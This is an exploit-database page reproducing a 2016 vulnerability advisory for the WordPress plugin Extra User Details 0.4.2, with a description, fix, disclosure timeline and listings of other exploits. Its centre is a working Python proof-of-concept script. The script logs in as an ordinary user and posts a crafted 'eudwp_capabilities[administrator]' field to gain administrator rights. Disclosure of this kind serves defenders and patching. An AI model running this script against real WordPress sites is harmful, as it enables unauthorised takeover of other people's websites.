Menu

Search for hundreds of thousands of exploits

"WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation"

Author

Exploit author

"Panagiotis Vagenas"

Platform

Exploit platform

php

Release date

Exploit published date

2016-02-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.

The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.

An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
 meta information to gain administrative privileges.

PoC
---

In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value

"""
# !/usr/bin/python3

################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
(http://www.crummy.com/software/BeautifulSoup/)
################################################################################

import requests
from bs4 import BeautifulSoup

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()

r = s.post(loginUrl, loginPostData)

if r.status_code != 200:
    print('Login error')
    exit(1)

r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')

f = soup.find('form', {'id': 'your-profile'})
if not f:
    print('Error')
    exit(1)

data = {
    'eudwp_capabilities[administrator]': 1,
}

for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']

r = s.post(profileUrl, data)

if r.status_code == 200:
    print('Success')

exit(0)

"""

Solution
--------

Upgrade to v0.4.2.1

Timeline
--------

1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue

"""
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-03-03 "WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-24 "WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2015-12-03 "Gnome Nautilus 3.16 - Denial of Service" dos linux "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2015-11-18 "WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2015-06-04 "WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion" webapps php "Panagiotis Vagenas"
2015-05-27 "WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-05-21 "WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities" webapps php "Panagiotis Vagenas"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.